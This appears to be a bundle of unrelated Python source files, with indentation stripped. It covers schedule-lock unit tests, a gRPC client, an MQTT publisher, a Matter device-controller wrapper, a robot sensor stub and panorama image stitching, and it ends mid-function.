self.assertEqual(schedule.node_id, self.node_id)
self.assertEqual(schedule.finished, False)
self.assertEqual(schedule.expired, False)
self.assertEqual(schedule.version, self.version)
self.assertEqual(schedule.times, 0)
self.assertEqual(schedule_model.type, self.schedule_type.value)
self.assertEqual(schedule_model.process_id, self.process_id)
self.assertEqual(schedule_model.node_id, self.node_id)
self.assertEqual(schedule_model.finished, False)
self.assertEqual(schedule_model.expired, False)
self.assertEqual(schedule_model.scheduling, False)
self.assertEqual(schedule_model.version, self.version)
self.assertEqual(schedule_model.schedule_times, 0)
def test_get_schedule(self):
schedule = self.mixin.get_schedule(self.schedule.id)
self.assertTrue(isinstance(schedule, Schedule))
self.assertEqual(schedule.id, self.schedule.id)
self.assertEqual(schedule.type, ScheduleType(self.schedule.type))
self.assertEqual(schedule.process_id, self.schedule.process_id)
self.assertEqual(schedule.node_id, self.schedule.node_id)
self.assertEqual(schedule.finished, self.schedule.finished)
self.assertEqual(schedule.expired, self.schedule.expired)
self.assertEqual(schedule.version, self.schedule.version)
self.assertEqual(schedule.times, self.schedule.schedule_times)
def test_get_schedule_with_node_and_version(self):
schedule = self.mixin.get_schedule_with_node_and_version(self.schedule.node_id, self.schedule.version)
self.assertTrue(isinstance(schedule, Schedule))
self.assertEqual(schedule.id, self.schedule.id)
self.assertEqual(schedule.type, ScheduleType(self.schedule.type))
self.assertEqual(schedule.process_id, self.schedule.process_id)
self.assertEqual(schedule.node_id, self.schedule.node_id)
self.assertEqual(schedule.finished, self.schedule.finished)
self.assertEqual(schedule.expired, self.schedule.expired)
self.assertEqual(schedule.version, self.schedule.version)
self.assertEqual(schedule.times, self.schedule.schedule_times)
def test_get_schedule_with_node_and_version_not_exist(self):
self.assertRaises(
DBSchedule.DoesNotExist, self.mixin.get_schedule_with_node_and_version, self.schedule.node_id, "not_exist",
)
def test_apply_schedule_lock(self):
schedule_count = 10
lock = threading.Lock()
res = {False: 0, True: 0}
def target(schedule_id):
success = self.mixin.apply_schedule_lock(schedule_id)
lock.acquire()
res[success] += 1
lock.release()
threads = [threading.Thread(target=target, args=(self.schedule.id,)) for i in range(schedule_count)]
for t in threads:
t.start()
for t in threads:
t.join(1)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.scheduling)
self.assertEqual(res[False], schedule_count - 1)
self.assertEqual(res[True], 1)
def test_apply_schedule_lock__all_fail(self):
self.schedule.scheduling = True
self.schedule.save()
schedule_count = 10
lock = threading.Lock()
res = {False: 0, True: 0}
def target(schedule_id):
success = self.mixin.apply_schedule_lock(schedule_id)
lock.acquire()
res[success] += 1
lock.release()
threads = [threading.Thread(target=target, args=(self.schedule.id,)) for i in range(schedule_count)]
for t in threads:
t.start()
for t in threads:
t.join(1)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.scheduling)
self.assertEqual(res[False], schedule_count)
self.assertEqual(res[True], 0)
def test_release_schedule_lock(self):
self.schedule.scheduling = True
self.schedule.save()
schedule_count = 10
def target(schedule_id):
self.mixin.release_schedule_lock(schedule_id)
threads = [threading.Thread(target=target, args=(self.schedule.id,)) for i in range(schedule_count)]
for t in threads:
t.start()
for t in threads:
t.join(1)
self.schedule.refresh_from_db()
self.assertFalse(self.schedule.scheduling)
def test_expire_schedule(self):
self.assertFalse(self.schedule.expired)
self.mixin.expire_schedule(self.schedule.id)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.expired)
def test_finish_schedule(self):
self.assertFalse(self.schedule.finished)
self.mixin.finish_schedule(self.schedule.id)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.finished)
def test_add_schedule_times(self):
self.assertEqual(self.schedule.schedule_times, 0)
self.mixin.add_schedule_times(self.schedule.id)
self.mixin.add_schedule_times(self.schedule.id)
self.mixin.add_schedule_times(self.schedule.id)
self.schedule.refresh_from_db()
self.assertEqual(self.schedule.schedule_times, 3)
|
dev_mp.py
|
import multiprocess as mp
import time
def foo_one(eve1, eve2):
print("Foo one is boosting")
time.sleep(5)
eve1.set() # Alarm foo_two()
eve2.wait() # Need to wait foo_two() finishing boosting
print("Foo one is running")
return None
def foo_two(eve1, eve2):
print("Foo two is boosting")
time.sleep(10)
eve2.set() # Alarm foo_one()
eve1.wait() # Need to wait foo_one() finishing boosting
print("Foo two is running")
return None
if __name__ == '__main__':
eve1 = mp.Event()
eve2 = mp.Event()
p1 = mp.Process(target = foo_one, args = [eve1, eve2])
p2 = mp.Process(target = foo_two, args = [eve1, eve2])
p1.start()
p2.start()
p1.join()
p2.join()
print("foo_one and foo_two finish")
|
client.py
|
# -*- coding: utf-8 -*-
import itertools
import socket
import threading
import time
from collections import deque
from logging import getLogger
from urllib.parse import urlparse
from grpc import StatusCode
from h2.errors import ErrorCodes
from nameko_grpc.compression import SUPPORTED_ENCODINGS, UnsupportedEncoding
from nameko_grpc.connection import ConnectionManager
from nameko_grpc.constants import Cardinality
from nameko_grpc.context import metadata_from_context_data
from nameko_grpc.errors import GrpcError
from nameko_grpc.inspection import Inspector
from nameko_grpc.streams import ReceiveStream, SendStream
from nameko_grpc.timeout import bucket_timeout
log = getLogger(__name__)
USER_AGENT = "grpc-python-nameko/0.0.1"
class ClientConnectionManager(ConnectionManager):
"""
An object that manages a single HTTP/2 connection on a GRPC client.
Extends the base `ConnectionManager` to make outbound GRPC requests.
"""
def __init__(self, sock):
super().__init__(sock, client_side=True)
self.pending_requests = deque()
self.counter = itertools.count(start=1, step=2)
def on_iteration(self):
""" On each iteration of the event loop, also initiate any pending requests.
"""
self.send_pending_requests()
super().on_iteration()
def send_request(self, request_headers):
""" Called by the client to invoke a GRPC method.
Establish a `SendStream` to send the request payload and `ReceiveStream`
for receiving the eventual response. `SendStream` and `ReceiveStream` are
returned to the client for providing the request payload and iterating
over the response.
Invocations are queued and sent on the next iteration of the event loop.
"""
stream_id = next(self.counter)
request_stream = SendStream(stream_id)
response_stream = ReceiveStream(stream_id)
self.receive_streams[stream_id] = response_stream
self.send_streams[stream_id] = request_stream
request_stream.headers.set(*request_headers)
self.pending_requests.append(stream_id)
return request_stream, response_stream
def response_received(self, event):
""" Called when a response is received on a stream.
If the headers contain an error, we should raise it here.
"""
super().response_received(event)
stream_id = event.stream_id
response_stream = self.receive_streams.get(stream_id)
if response_stream is None:
self.conn.reset_stream(stream_id, error_code=ErrorCodes.PROTOCOL_ERROR)
return
headers = response_stream.headers
if int(headers.get("grpc-status", 0)) > 0:
error = GrpcError.from_headers(headers)
response_stream.close(error)
def trailers_received(self, event):
""" Called when trailers are received on a stream.
If the trailers contain an error, we should raise it here.
"""
super().trailers_received(event)
stream_id = event.stream_id
response_stream = self.receive_streams.get(stream_id)
if response_stream is None:
self.conn.reset_stream(stream_id, error_code=ErrorCodes.PROTOCOL_ERROR)
return
trailers = response_stream.trailers
if int(trailers.get("grpc-status", 0)) > 0:
error = GrpcError.from_headers(trailers)
response_stream.close(error)
def send_pending_requests(self):
""" Initiate requests for any pending invocations.
Sends initial headers and any request data that is ready to be sent.
"""
while self.pending_requests:
stream_id = self.pending_requests.popleft()
log.debug("initiating request, new stream %s", stream_id)
# send headers immediately rather than waiting for data. this ensures
# streams are established with increasing stream ids regardless of when
# the request data is available
self.send_headers(stream_id, immediate=True)
self.send_data(stream_id)
def send_data(self, stream_id):
try:
super().send_data(stream_id)
except UnsupportedEncoding:
response_stream = self.receive_streams[stream_id]
request_stream = self.send_streams[stream_id]
error = GrpcError(
status=StatusCode.UNIMPLEMENTED,
details="Algorithm not supported: {}".format(request_stream.encoding),
)
response_stream.close(error)
request_stream.close()
class Future:
def __init__(self, response_stream, output_type, cardinality):
self.response_stream = response_stream
self.output_type = output_type
self.cardinality = cardinality
def initial_metadata(self):
return self.response_stream.headers.for_application
def trailing_metadata(self):
return self.response_stream.trailers.for_application
def result(self):
response = self.response_stream.consume(self.output_type)
if self.cardinality in (Cardinality.STREAM_UNARY, Cardinality.UNARY_UNARY):
response = next(response)
return response
class Method:
def __init__(self, client, name, context_data=None):
self.client = client
self.name = name
self.context_data = context_data or {}
def __call__(self, request, **kwargs):
return self.future(request, **kwargs).result()
def future(self, request, timeout=None, compression=None, metadata=None):
inspector = Inspector(self.client.stub)
cardinality = inspector.cardinality_for_method(self.name)
input_type = inspector.input_type_for_method(self.name)
output_type = inspector.output_type_for_method(self.name)
service_name = inspector.service_name
compression = compression or self.client.default_compression
if compression not in SUPPORTED_ENCODINGS:
log.warning(
"Invalid compression algorithm: '{}'. Ignoring.".format(compression)
)
compression = self.client.default_compression
request_headers = [
(":method", "POST"),
(":scheme", "http"),
(":authority", urlparse(self.client.target).hostname),
(":path", "/{}/{}".format(inspector.service_name, self.name)),
("te", "trailers"),
("content-type", "application/grpc+proto"),
("user-agent", USER_AGENT),
("grpc-encoding", compression),
("grpc-message-type", "{}.{}".format(service_name, input_type.__name__)),
("grpc-accept-encoding", ",".join(SUPPORTED_ENCODINGS)),
]
if metadata is not None:
metadata = metadata[:]
else:
metadata = []
metadata.extend(metadata_from_context_data(self.context_data))
for key, value in metadata:
request_headers.append((key, value))
if timeout is not None:
request_headers.append(("grpc-timeout", bucket_timeout(timeout)))
if cardinality in (Cardinality.UNARY_UNARY, Cardinality.UNARY_STREAM):
request = (request,)
response_stream = self.client.invoke(request_headers, request, timeout)
return Future(response_stream, output_type, cardinality)
class Proxy:
def __init__(self, client):
self.client = client
def __getattr__(self, name):
return Method(self.client, name)
class Client:
""" Standalone GRPC client that uses native threads.
"""
manager = None
sock = None
def __init__(
self, target, stub, compression_algorithm="none", compression_level="high"
):
self.target = target
self.stub = stub
self.compression_algorithm = compression_algorithm
self.compression_level = compression_level # NOTE not used
def __enter__(self):
return self.start()
def __exit__(self, *args):
self.stop()
@property
def default_compression(self):
if self.compression_algorithm != "none":
return self.compression_algorithm
return "identity"
def start(self):
target = urlparse(self.target)
self.sock = socket.socket()
self.sock.connect((target.hostname, target.port or 50051))
self.manager = ClientConnectionManager(self.sock)
threading.Thread(target=self.manager.run_forever).start()
return Proxy(self)
def stop(self):
if self.manager:
self.manager.stop()
self.sock.close()
def timeout(self, send_stream, response_stream, deadline):
start = time.time()
while True:
elapsed = time.time() - start
if elapsed > deadline:
error = GrpcError(
status=StatusCode.DEADLINE_EXCEEDED, details="Deadline Exceeded"
)
response_stream.close(error)
send_stream.close()
time.sleep(0.001)
def invoke(self, request_headers, request, timeout):
send_stream, response_stream = self.manager.send_request(request_headers)
if timeout:
threading.Thread(
target=self.timeout, args=(send_stream, response_stream, timeout)
).start()
threading.Thread(target=send_stream.populate, args=(request,)).start()
return response_stream
|
paralel_test.py
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
import paho.mqtt.publish as publish
from multiprocessing import Process
import time
import os
import logging
import random
# create logger
logger = logging.getLogger('PSENSv0.1')
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(funcName)s - %(lineno)d - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
def info(title):
logger.debug(title)
logger.debug('debug message')
if hasattr(os, 'getppid'): # only available on Unix
logger.debug( 'parent process : %i', os.getppid())
logger.debug( 'process id: %i', os.getpid())
def logon(org,place,brokerIP,clientId):
logger.debug(logon)
info('logon')
while True:
publish.single(org + "/" + place + "/" + "internal/status/logon" , "0", hostname = brokerIP, client_id= clientId, will=None, auth=None,tls=None)
logger.debug('Sleeping 6 sec')
time.sleep(1) #seconds
if random.randint(0,5) == 1:
break
def broker(org,place,brokerIP,clientId):
logger.debug(broker)
info('broker')
while True:
publish.single(org + "/" + place + "/" + "internal/status/publish" , "0", hostname = brokerIP, client_id= clientId, will=None, auth=None,tls=None)
logger.debug('Sleeping 12 sec')
time.sleep(1.5) #seconds
if __name__ == '__main__':
info('main line')
p = Process(target=logon, args=('sens.solutions','pool','84.88.95.122','Raspi1'))
p.start()
o = Process(target=broker, args=('sens.solutions','pool','84.88.95.122','Raspi2'))
o.start()
while True:
if not p.is_alive():
logger.warning('logon is DEAD - Restarting-it')
p.terminate()
p.run()
time.sleep(0.5)
logger.warning( "New PID: " + str(p.pid))
if o.is_alive():
pass
#logger.debug('broker is alive? %s',str(o.is_alive()))
else:
logger.warning('broker is DEAD - Restarting-it')
o.start()
p.join()
o.join()
|
ChipDeviceCtrl.py
|
#
# Copyright (c) 2020 Project CHIP Authors
# Copyright (c) 2019-2020 Google, LLC.
# Copyright (c) 2013-2018 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Python interface for Chip Device Manager
#
"""Chip Device Controller interface
"""
from __future__ import absolute_import
from __future__ import print_function
import time
from threading import Thread
from ctypes import *
from .ChipStack import *
import enum
__all__ = ["ChipDeviceController"]
_CompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_ErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_ulong, POINTER(DeviceStatusStruct))
_GetBleEventFunct = CFUNCTYPE(c_void_p)
_WriteBleCharacteristicFunct = CFUNCTYPE(
c_bool, c_void_p, c_void_p, c_void_p, c_void_p, c_uint16
)
_SubscribeBleCharacteristicFunct = CFUNCTYPE(
c_bool, c_void_p, c_void_p, c_void_p, c_bool
)
_CloseBleFunct = CFUNCTYPE(c_bool, c_void_p)
# typedef void (*OnConnectFunct)(Chip::DeviceController::hipDeviceController * dc, chip::Transport::PeerConnectionState * state,
# void * appReqState);
# typedef void (*OnErrorFunct)(Chip::DeviceController::ChipDeviceController * dc, void * appReqState, CHIP_ERROR err,
# const Inet::IPPacketInfo * pi);
# typedef void (*OnMessageFunct)(Chip::DeviceController::ChipDeviceController * dc, void * appReqState, PacketBuffer * buffer);
_OnConnectFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p)
_OnRendezvousErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint32, c_void_p)
_OnMessageFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p)
# This is a fix for WEAV-429. Jay Logue recommends revisiting this at a later
# date to allow for truely multiple instances so this is temporary.
def _singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
class DCState(enum.IntEnum):
NOT_INITIALIZED = 0
IDLE = 1
BLE_READY = 2
RENDEZVOUS_ONGOING = 3
RENDEZVOUS_CONNECTED = 4
@_singleton
class ChipDeviceController(object):
def __init__(self, startNetworkThread=True):
self.state = DCState.NOT_INITIALIZED
self.devCtrl = None
self.networkThread = None
self.networkThreadRunable = False
self._ChipStack = ChipStack()
self._dmLib = None
self._InitLib()
devCtrl = c_void_p(None)
res = self._dmLib.nl_Chip_DeviceController_NewDeviceController(pointer(devCtrl))
if res != 0:
raise self._ChipStack.ErrorToException(res)
pairingDelegate = c_void_p(None)
res = self._dmLib.nl_Chip_ScriptDevicePairingDelegate_NewPairingDelegate(pointer(pairingDelegate))
if res != 0:
raise self._ChipStack.ErrorToException(res)
res = self._dmLib.nl_Chip_DeviceController_SetDevicePairingDelegate(devCtrl, pairingDelegate)
if res != 0:
raise self._ChipStack.ErrorToException(res)
self.devCtrl = devCtrl
self.pairingDelegate = pairingDelegate
self._ChipStack.devCtrl = devCtrl
self.blockingCB = None # set by other modules(BLE) that require service by thread while thread blocks.
self.cbHandleBleEvent = (
None # set by other modules (BLE) that provide event callback to Chip.
)
self.cbHandleBleWriteChar = None
self.cbHandleBleSubscribeChar = None
self.cbHandleBleClose = None
def DeviceCtrlHandleMessage(appReqState, buffer):
pass
self.cbHandleMessage = _OnMessageFunct(DeviceCtrlHandleMessage)
def HandleRendezvousError(appState, reqState, err, devStatusPtr):
if self.state == DCState.RENDEZVOUS_ONGOING:
print("Failed to connect to device: {}".format(err))
self._ChipStack.callbackRes = True
self._ChipStack.completeEvent.set()
elif self.state == DCState.RENDEZVOUS_CONNECTED:
print("Disconnected from device")
self.cbHandleRendezvousError = _OnRendezvousErrorFunct(HandleRendezvousError)
if startNetworkThread:
self.StartNetworkThread()
self.state = DCState.IDLE
def __del__(self):
if self.devCtrl != None:
self._dmLib.nl_Chip_DeviceController_DeleteDeviceManager(self.devCtrl)
self.devCtrl = None
def DriveBleIO(self):
# perform asynchronous write to pipe in IO thread's select() to wake for BLE input
res = self._dmLib.nl_Chip_DeviceController_WakeForBleIO()
if res != 0:
raise self._ChipStack.ErrorToException(res)
def SetBleEventCB(self, bleEventCB):
if self.devCtrl != None:
self.cbHandleBleEvent = _GetBleEventFunct(bleEventCB)
self._dmLib.nl_Chip_DeviceController_SetBleEventCB(self.cbHandleBleEvent)
def SetBleWriteCharCB(self, bleWriteCharCB):
if self.devCtrl != None:
self.cbHandleBleWriteChar = _WriteBleCharacteristicFunct(bleWriteCharCB)
self._dmLib.nl_Chip_DeviceController_SetBleWriteCharacteristic(
self.cbHandleBleWriteChar
)
def SetBleSubscribeCharCB(self, bleSubscribeCharCB):
if self.devCtrl != None:
self.cbHandleBleSubscribeChar = _SubscribeBleCharacteristicFunct(
bleSubscribeCharCB
)
self._dmLib.nl_Chip_DeviceController_SetBleSubscribeCharacteristic(
self.cbHandleBleSubscribeChar
)
def SetBleCloseCB(self, bleCloseCB):
if self.devCtrl != None:
self.cbHandleBleClose = _CloseBleFunct(bleCloseCB)
self._dmLib.nl_Chip_DeviceController_SetBleClose(self.cbHandleBleClose)
def StartNetworkThread(self):
if self.networkThread != None:
return
def RunNetworkThread():
while self.networkThreadRunable:
self._ChipStack.networkLock.acquire()
self._dmLib.nl_Chip_DeviceController_DriveIO(50)
self._ChipStack.networkLock.release()
time.sleep(0.005)
self.networkThread = Thread(target=RunNetworkThread, name="ChipNetworkThread")
self.networkThread.daemon = True
self.networkThreadRunable = True
self.networkThread.start()
def IsConnected(self):
return self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_IsConnected(self.devCtrl)
)
def ConnectBle(self, bleConnection):
self._ChipStack.CallAsync(
lambda: self._dmLib.nl_Chip_DeviceController_ValidateBTP(
self.devCtrl,
bleConnection,
self._ChipStack.cbHandleComplete,
self._ChipStack.cbHandleError,
)
)
def Connect(self, connObj, setupPinCode):
def HandleComplete(dc, connState, appState):
print("Rendezvoud Complete")
self.state = DCState.RENDEZVOUS_CONNECTED
self._ChipStack.callbackRes = True
self._ChipStack.completeEvent.set()
onConnectFunct = _OnConnectFunct(HandleComplete)
self.state = DCState.RENDEZVOUS_ONGOING
return self._ChipStack.CallAsync(
lambda: self._dmLib.nl_Chip_DeviceController_Connect(self.devCtrl, connObj, setupPinCode, onConnectFunct, self.cbHandleMessage, self.cbHandleRendezvousError)
)
def Close(self):
self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_Close(self.devCtrl)
)
def SetLogFilter(self, category):
if category < 0 or category > pow(2, 8):
raise ValueError("category must be an unsigned 8-bit integer")
self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_SetLogFilter(category)
)
def GetLogFilter(self):
self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_GetLogFilter()
)
def SetBlockingCB(self, blockingCB):
self._ChipStack.blockingCB = blockingCB
def SetWifiCredential(self, ssid, password):
ret = self._dmLib.nl_Chip_ScriptDevicePairingDelegate_SetWifiCredential(self.pairingDelegate, ssid.encode("utf-8"), password.encode("utf-8"))
if ret != 0:
raise self._ChipStack.ErrorToException(res)
# ----- Private Members -----
def _InitLib(self):
if self._dmLib is None:
self._dmLib = CDLL(self._ChipStack.LocateChipDLL())
self._dmLib.nl_Chip_DeviceController_NewDeviceController.argtypes = [
POINTER(c_void_p)
]
self._dmLib.nl_Chip_DeviceController_NewDeviceController.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_DeleteDeviceController.argtypes = [
c_void_p
]
self._dmLib.nl_Chip_DeviceController_DeleteDeviceController.restype = (
c_uint32
)
self._dmLib.nl_Chip_DeviceController_Close.argtypes = [c_void_p]
self._dmLib.nl_Chip_DeviceController_Close.restype = None
self._dmLib.nl_Chip_DeviceController_DriveIO.argtypes = [c_uint32]
self._dmLib.nl_Chip_DeviceController_DriveIO.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_WakeForBleIO.argtypes = []
self._dmLib.nl_Chip_DeviceController_WakeForBleIO.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_SetBleEventCB.argtypes = [
_GetBleEventFunct
]
self._dmLib.nl_Chip_DeviceController_SetBleEventCB.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_SetBleWriteCharacteristic.argtypes = [
_WriteBleCharacteristicFunct
]
self._dmLib.nl_Chip_DeviceController_SetBleWriteCharacteristic.restype = (
c_uint32
)
self._dmLib.nl_Chip_DeviceController_SetBleSubscribeCharacteristic.argtypes = [
_SubscribeBleCharacteristicFunct
]
self._dmLib.nl_Chip_DeviceController_SetBleSubscribeCharacteristic.restype = (
c_uint32
)
self._dmLib.nl_Chip_DeviceController_SetBleClose.argtypes = [_CloseBleFunct]
self._dmLib.nl_Chip_DeviceController_SetBleClose.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_IsConnected.argtypes = [c_void_p]
self._dmLib.nl_Chip_DeviceController_IsConnected.restype = c_bool
self._dmLib.nl_Chip_DeviceController_ValidateBTP.argtypes = [
c_void_p,
c_void_p,
_CompleteFunct,
_ErrorFunct,
]
self._dmLib.nl_Chip_DeviceController_ValidateBTP.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_GetLogFilter.argtypes = []
self._dmLib.nl_Chip_DeviceController_GetLogFilter.restype = c_uint8
self._dmLib.nl_Chip_DeviceController_SetLogFilter.argtypes = [c_uint8]
self._dmLib.nl_Chip_DeviceController_SetLogFilter.restype = None
self._dmLib.nl_Chip_DeviceController_Connect.argtypes = [c_void_p, c_void_p, c_uint32, _OnConnectFunct, _OnMessageFunct, _OnRendezvousErrorFunct]
self._dmLib.nl_Chip_DeviceController_Connect.restype = c_uint32
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_NewPairingDelegate.argtypes = [POINTER(c_void_p)]
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_NewPairingDelegate.restype = c_uint32
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_SetWifiCredential.argtypes = [c_void_p, c_char_p, c_char_p]
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_SetWifiCredential.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_SetDevicePairingDelegate.argtypes = [c_void_p, c_void_p]
self._dmLib.nl_Chip_DeviceController_SetDevicePairingDelegate.restype = c_uint32
|
remoteSensors.py
|
from threading import Thread
from time import sleep
class AngleSensor:
"""
Angle sensor has two main roles. It listens on the specified
port for udp angle packets and parses them to obtain the most
recent value for the angle to target. It also acts as a data
source for a PIDController.
If the target is to the left of the robot, the angle is reported
as negative.
Example:
angleSensor = AngleSensor('10.10.76.7', 8812)
This creates channel to listen on port 8812 for angle information.
"""
def __init__(self, sensor_ip, listen_port):
self.vision_ip = sensor_ip
self.angle = 0
def pidGet(self):
# return cached value that was last received from
# the vision system
#
return self.angle
class RangeSensor:
"""
RangeSensor has two main functions. The first is to listen on the specified listen_port
for range packets from forward facing sonar units. The second is to act as a datasource
for PIDController object.
Example:
rangeSensor = RangeSensor('10.10.76.9', 8813)
"""
def __init__(self, sensor_ip, listen_port):
self.sonar_ip = sensor_ip
self.range_cm = 0
self.listening = True
self.t = Thread(target = RangeSensor.receivePackets, args=(self,))
self.t.start()
def stop(self):
self.listening = False
def pidGet(self):
# return cached value that was last receive from
# the sonar unit
return self.range_cm
def receivePackets(self):
"""
Run a continuous loop in this function that
"""
i = 0
while self.listening:
i += 1
pkt = do_some_blocking_io(i)
self.range_cm = contents(pkt)
def do_some_blocking_io(x):
print("Blocking operation started. Each takes 5 seconds.")
sleep(5)
print("Blocking operation ended..")
return x
def contents(p):
return p
def main():
"""
Pretend this is a robot init + loop (with 1 second period)
"""
rs = RangeSensor('10.10.76.9', 8813)
for i in range(25):
print("Range reading is {}".format(rs.pidGet()))
sleep(1)
rs.stop()
if __name__ == "__main__":
main()
|
panorama.py
|
import numpy as np
import algos
import utils
import viz
import threading
def cornerDetectionAndSuppression(I, Imask, anms, cmax, out):
if not anms:
_, Ixy = algos.harris(I, maxPeaks=cmax)
out.append(Ixy)
Id = algos.makeDescriptors(I, Ixy)
out.append(Id)
else:
Ih, Ixy = algos.harris(Imask if Imask is not None else I, maxPeaks=-1)
Ixy_ = algos.anms(Ih, Ixy, cmax=cmax)
out.append(Ixy)
out.append(Ixy_)
Id = algos.makeDescriptors(I, Ixy_)
out.append(Id)
def stitch(S, T, Tpre, anms, cmax, maskpow=1., intermediates=None):
# 1. Operate on grayscale images (red channel chosen arbitrarily):
S_, T_ = S[..., 0], T[..., 0]
# 2. Corner Detection + Non-Maximal Suppression:
Tmask = np.where(Tpre != 0, T, 0)[..., 0] if anms else None
out = [[], []]
tasks = [
threading.Thread(target=cornerDetectionAndSuppression, args=(S_, None, anms, cmax, out[0])),
threading.Thread(target=cornerDetectionAndSuppression, args=(T_, Tmask, anms, cmax, out[1]))
]
[t.start() for t in tasks]
[t.join() for t in tasks]
# All detected corners + descriptors
Sxy_, Txy_ = out[0][0], out[1][0]
Sd, Td = out[0][-1], out[1][-1]
if not anms:
# Keep lower of N most prominent between S and T
hmin = min(Sxy_.shape[0], Txy_.shape[0])
Sxy, Txy = Sxy_[:hmin], Txy_[:hmin]
Sd, Td = Sd[..., :hmin], Td[..., :hmin]
else:
# ANMS already dropped some
Sxy, Txy = out[0][1], out[1][1]
print('[total corners]:\t\t\t\tS: {} | T: {}'.format(len(Sxy_), len(Txy_)))
print('[after suppression ({})]:\t\t\t\tS: {} | T: {}'.format('ANMS' if anms else 'rank+min', len(Sxy), len(Txy)))
if intermediates is not None:
# plot all corners found
S1_, T1_ = viz.plotImages(S, T, Sxy_, Txy_)
intermediates.append(S1_)
intermediates.append(T1_)
# plot corners left after suppression
S1_, T1_ = viz.plotImages(S, T, Sxy, Txy)
intermediates.append(S1_)
intermediates.append(T1_)
# 3. Match 9x9 descriptors out of detected corners:
idx = algos.matchDescriptors(Sd, Td, nnMax=0.55)
print('[matched descriptors]:\t\t{}'.format(len(idx)))
if intermediates is not None:
# plot matched descriptors:
S1_ = viz.plotDescriptors(S, Sxy[idx[:, 0], :], size=9)
T1_ = viz.plotDescriptors(T, Txy[idx[:, 1], :], size=9)
intermediates.append(S1_)
intermediates.append(T1_)
# 4. Create homography from source to target, based on the best
# set of descriptors computed via RANSAC:
H, c = algos.ransac(Sxy, Txy, idx, e=6, n=1000)
print('[RANSAC set length]:\t\t{}'.format(len(c)))
if H is None:
print('skip')
return T, T
if intermediates is not None:
# plot best matched descriptors after RANSAC:
S1_ = viz.plotDescriptors(S, Sxy[idx[c, 0], :], size=9)
T1_ = viz.plotDescriptors(T, Txy[idx[c, 1], :], size=9)
f = viz.plotMatches(S1_, T1_, Sxy[idx[c, 0], :], Txy[idx[c, 1], :])
if f:
intermediates.append(f)
else:
intermediates.append(S1_)
intermediates.append(T1_)
th, tw = T.shape[0], T.shape[1]
sh, sw = S.shape[0], S.shape[1]
# 5. Forward warp source corners onto target space to compute final composite size:
Sc_ = np.column_stack([(0, 0, 1), (sw - 1, 0, 1), (sw - 1, sh - 1, 1), (0, sh - 1, 1)])
Tc_ = H @ Sc_
Tc = (Tc_ / Tc_[-1])[:-1]
if (Tc_[:2, 0] < Sc_[:2, 0]).any():
maskRange = (0., 1.)
else:
maskRange = (1., 0.)
cmin = np.minimum(np.amin(Tc, axis=1), (0, 0))
cmax = np.maximum(np.amax(Tc, axis=1), (tw - 1, th - 1))
csize = np.ceil((cmax - cmin) + 1).astype(np.int)[::-1]
if len(T.shape) is 3:
csize = (*csize, T.shape[2])
# 6. Copy target to new size:
T_ = np.zeros(csize)
cmin = np.abs(cmin).astype(np.int)
T_[cmin[1]: cmin[1] + th, cmin[0]: cmin[0] + tw] = T
# 7. Inverse warp target onto source space (accounting for offset in new target size):
i = np.meshgrid(np.arange(csize[1]), np.arange(csize[0]))
Txy_ = np.vstack((i[0].flatten(), i[1].flatten(), np.ones(csize[0] * csize[1]))).astype(np.int)
cmin_ = np.row_stack((*cmin, 0))
H_ = np.linalg.inv(H)
Sxy_ = H_ @ (Txy_ - cmin_)
Sxy = (Sxy_ / Sxy_[-1])[:-1]
Txy = Txy_[:-1]
# 8. Copy source to new size (from points in source space range to target space).
S_ = np.zeros(csize)
i = ((Sxy.T >= (0, 0)) & (Sxy.T <= (sw - 1, sh - 1))).all(axis=1).nonzero()[0]
Txy = Txy[:, i]
Sxy = Sxy[:, i]
S_[Txy[1], Txy[0]] = algos.binterp(S, Sxy[0], Sxy[1])
# 9. Final composite (a quick alpha blending):
m = np.where((S_ != 0) & (T_ != 0))
mvals = np.interp(m[1], (m[1].min(), m[1].max()), maskRange) ** maskpow
C = np.where(S_ != 0, S_, T_)
C[m] = (1.-mvals)*S_[m] + mvals*T_[m]
if intermediates is not None:
S1_ = S_.copy()
T1_ = T_.copy()
S1_[m] = (1. - mvals) * S1_[m]
T1_[m] = mvals * T1_[m]
intermediates.append(S_)
intermediates.append(T_)
intermediates.append(S1_)
intermediates.append(T1_)
return C, T_
def testPanorama(example, outprefix, anms, cmax, intermediates=False):
if example == 1:
# example 1: living room
